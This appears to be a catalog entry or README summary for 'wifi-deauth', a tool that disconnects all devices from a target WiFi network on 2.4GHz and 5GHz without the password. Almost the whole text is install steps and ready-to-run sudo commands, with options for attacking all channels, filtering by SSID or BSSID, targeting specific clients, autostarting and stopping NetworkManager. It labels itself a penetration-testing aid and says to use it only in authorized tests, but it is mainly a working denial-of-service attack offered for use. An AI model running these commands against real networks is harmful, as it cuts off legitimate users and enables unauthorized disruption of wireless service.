A tool that performs deauthentication attacks to disconnect all devices from a target WiFi network on both 2.4GHz and 5GHz bands without needing the network password.
A deauth attack that disconnects all devices from the target wifi network (2.4Ghz & 5Ghz)
This tool is primarily used by penetration testers and red teamers to simulate denial-of-service attacks on WiFi networks by forcibly disconnecting clients. It helps security professionals assess the resilience of wireless networks against deauthentication attacks and test network monitoring and response capabilities.
Requires a Linux OS and a wireless network adapter capable of monitor mode and packet injection. Running the tool may disrupt legitimate network users and should only be used in authorized testing environments. Using the --clients option is not recommended as clients may reconnect with randomized MAC addresses. NetworkManager service may interfere with the attack and can be stopped using the --kill option or manually. For full effectiveness on APs operating dual bands under the same SSID/BSSID, running two instances targeting 2.4GHz and 5GHz simultaneously is advised.
git clone https://github.com/flashnuke/wifi-deauth.git
cd wifi-deauth
sudo pip3 install .
sudo wifi-deauth -i <iface>
Run the deauthentication attack on the specified network interface after installing the tool.
sudo python3 wifi_deauth.py -i <iface>
Run the tool without installing by executing the script directly after installing requirements.
sudo pip3 install -r requirements.txt
Install required Python dependencies manually when running without installation.
sudo wifi-deauth -i <iface> --deauth-all-channels
Send deauthentication packets on all allowed channels iteratively to target APs that switch channels.
sudo wifi-deauth -i <iface> --ssid <name>
Filter and attack a specific SSID by case-insensitive substring to reduce scanning time.
sudo wifi-deauth -i <iface> --bssid <addr>
Filter and attack a specific access point by its BSSID (MAC address).
sudo wifi-deauth -i <iface> --autostart
Automatically start the deauthentication loop when only one access point is found.
sudo wifi-deauth -i <iface> --channels <ch1,ch2>
Scan and attack only specified WiFi channels instead of all supported channels.
sudo wifi-deauth -i <iface> --clients <m_addr1,m_addr2>
Target deauthentication packets to specific client MAC addresses instead of broadcast.
sudo wifi-deauth -i <iface> --debug
Enable debug output for troubleshooting and detailed information.
sudo wifi-deauth -i <iface> --kill
Stop NetworkManager service to prevent interference with the attack.
sudo wifi-deauth -i <iface> --skip-monitormode
Skip automatic enabling of monitor mode if it is already enabled manually.